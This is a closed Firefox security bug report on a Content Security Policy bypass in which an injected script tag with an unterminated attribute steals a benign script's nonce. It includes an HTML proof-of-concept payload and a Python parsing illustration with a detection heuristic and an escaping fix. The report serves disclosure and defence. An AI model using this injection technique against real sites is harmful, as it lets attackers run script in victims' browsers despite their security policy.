Closed Bug 1761215 Opened 2 years ago Closed 2 years ago

CSP bypass through nonce stealing

Categories

(Core :: DOM: Security, defect, P3)

Firefox 98
defect

RESOLVED DUPLICATE of bug 1397308

People

(Reporter: gertjan.franken, Unassigned)

References

(Blocks 1 open bug)

Details

(Keywords: sec-low, Whiteboard: [domsecurity-backlog1])

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.83 Safari/537.36

Steps to reproduce:

An attacker can bypass a Content Security Policy defining a nonce if their injected script is able to steal the nonce of a benign script.

PoC: https://gray-gorgeous-parsnip.glitch.me/

Code:

<head>
    <meta http-equiv="Content-Security-Policy" content="script-src 'nonce-abcd'">
</head>
<body>
    <!-- line below is injected by attacker -->
    <script src="data:,alert('malicious script')" x="
    <p>Lorem ipsum</p>
    <script id="benign" nonce="abcd">
      alert('benign script');
    </script>
</body>

I came across this bug while checking out this Chrome bug: https://bugs.chromium.org/p/chromium/issues/detail?id=740615.

Actual results:

The injected script executes by stealing the nonce of a benign script.

Expected results:

The injected script should not be able to execute.
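Added illustration, not part of the report or of Firefox: running the PoC through Python's standard-library html.parser shows the injected tag ending up with the benign nonce, flags the swallowed markup as a detection heuristic, and shows that HTML-encoding the untrusted text before it reaches the page (the application-side defence, separate from the browser change tracked in bug 1397308) leaves only the benign script nonced. The template constant, the collector class and the helper names are my own, and html.parser is used as a stand-in for the browser's tokenizer.

```python
import html
from html.parser import HTMLParser

# Page skeleton from the PoC above; {untrusted} is where attacker-controlled text lands.
PAGE_TEMPLATE = """<head>
    <meta http-equiv="Content-Security-Policy" content="script-src 'nonce-abcd'">
</head>
<body>
    {untrusted}
    <p>Lorem ipsum</p>
    <script id="benign" nonce="abcd">
      alert('benign script');
    </script>
</body>
"""

# The injected line from the report: the unterminated x=" swallows everything up
# to the next double quote, which sits inside the benign <script> start tag.
INJECTED = '<script src="data:,alert(\'malicious script\')" x="'

class ScriptCollector(HTMLParser):
    """Records the attributes of each <script> start tag as the parser sees them."""
    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts.append(dict(attrs))

def script_tags(document):
    parser = ScriptCollector()
    parser.feed(document)
    parser.close()
    return parser.scripts

def nonced_scripts(document, nonce):
    """Script elements that a 'nonce-<value>' source expression would allow to run."""
    return [s for s in script_tags(document) if s.get("nonce") == nonce]

def has_swallowed_markup(attrs):
    """Defender-side heuristic: a '<' inside an attribute value means the tag ran
    into the markup that followed it, the signature of dangling-markup injection."""
    return any(v is not None and "<" in v for v in attrs.values())

def render(untrusted, escape):
    """HTML-encoding untrusted text before interpolation is the application-side fix."""
    text = html.escape(untrusted) if escape else untrusted
    return PAGE_TEMPLATE.format(untrusted=text)
```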

Group: firefox-core-security → core-security
Component: Untriaged → DOM: Security
Product: Firefox → Core
Group: core-security → dom-core-security
Blocks: csp-w3c-3
Severity: -- → S3
Status: UNCONFIRMED → NEW
Ever confirmed: true
Keywords: sec-low
Priority: -- → P3
Whiteboard: [domsecurity-backlog1]
Group: dom-core-security
Status: NEW → RESOLVED
Closed: 2 years ago
Resolution: --- → DUPLICATE